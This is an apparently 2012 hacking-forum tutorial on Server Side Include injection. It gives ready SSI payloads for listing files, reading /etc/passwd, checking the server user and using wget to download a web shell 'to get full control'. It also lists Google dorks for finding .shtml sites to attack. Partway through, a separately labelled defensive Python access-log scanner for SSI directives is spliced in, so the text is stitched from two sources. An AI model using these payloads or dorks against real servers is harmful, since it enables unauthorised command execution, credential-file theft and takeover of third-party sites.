HackerRIZLA

SSI Tutorial.

Sep 15th, 2012
Server Side Includes

What is It?

A Server Side Include (SSI) attack is an extremely useful attack for executing commands on the server. You need basic knowledge of Bash or Batch to know which commands could help compromise the server.

What Sites are Vulnerable?

For a site to be vulnerable to SSI injection, Apache needs Server Side Includes allowed in the config file, or the file extension must end in '.shtml', '.shtm' or '.stm'. Apache, lighttpd and IIS all support SSI.

Testing for SSI Injection

To audit a site for SSI injection, search all the directories for '.shtml', '.shtm' or '.stm' extensions. If you find any, SSI is probably enabled; if you don't find any, it may still be enabled. SSI injection affects pages that use request data without sanitizing it (e.g. no filters removing <!--#exec … -->). To test, enter the following command into the request:

<!--#exec cmd="ls" -->

If filesystem output appears, the page is vulnerable. If the server is Windows, replace 'ls' with 'dir'.
You test for SSI the same way as XSS; you can post the command into:

- Textboxes/search boxes
- Headers
- Cookies
- Address Bar
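A defender-side check for the injection points listed above, as an added example that is not part of the original paste: it scans web-server access-log lines for SSI directives in the request line, Referer and User-Agent, URL-decoding each field first. The log lines are constructed samples, and the names `find_ssi`, `decode` and `SAMPLE_LOG` are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Directive names from Apache mod_include; matched case-insensitively.
SSI_RE = re.compile(
    r"<!--#(exec|include|echo|config|printenv|set|fsize|flastmod)\b", re.I)
# One quoted log field; Apache writes an embedded quote as \" inside it.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
# Combined Log Format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(r"^(\S+) \S+ \S+ \[[^\]]+\] " + QUOTED
                    + r" \d{3} \S+ " + QUOTED + " " + QUOTED)
FIELDS = ("request", "referer", "user-agent")

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Sep/2012:10:00:01 +0000] "GET /search.shtml?q='
    '%3C%21--%23exec+cmd%3D%22ls%22+--%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Sep/2012:10:00:05 +0000] "GET /index.shtml HTTP/1.1" '
    '200 2048 "-" "<!--#include virtual=\\"/etc/passwd\\" -->"',
    '198.51.100.4 - - [15/Sep/2012:10:01:00 +0000] "GET /index.shtml HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [15/Sep/2012:10:02:00 +0000] "GET /p.shtml?n=%253C%2521--'
    '%2523echo%2520var%253D%2522DATE_LOCAL%2522%2520--%253E HTTP/1.1" 200 9 "-" "-"',
]


def decode(value, rounds=3):
    """URL-decode up to `rounds` times so double-encoded input still matches."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value.replace('\\"', '"')  # undo the log's quote escaping


def find_ssi(line):
    """Return (field, directive, client_ip) for each SSI directive in a line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    ip, values = m.group(1), m.groups()[1:]
    return [(field, hit.group(1).lower(), ip)
            for field, value in zip(FIELDS, values)
            for hit in SSI_RE.finditer(decode(value))]


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(find_ssi(entry))
```

Cookies and POST bodies do not appear in the Combined Log Format, so covering those injection points needs a log format or proxy that records them.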

Useful Commands

Show Files Linux

<!--#exec cmd="ls" -->

Show Files Windows

<!--#exec cmd="dir" -->

Read /etc/passwd

<!--#include virtual="/etc/passwd" -->

What user the webserver is running as

<!--#exec cmd="whoami" -->

Download a shell to the server to get full control

<!--#exec cmd="wget "shell.php"" -->

Dorks

Similar to SQLi dorks, these return a list of sites that may or may not be vulnerable to SSI injection.

inurl:index.shtml
inurl:index.shtm
inurl:index.stm

There are many others, but you can just use your imagination.

Hope you liked this tutorial.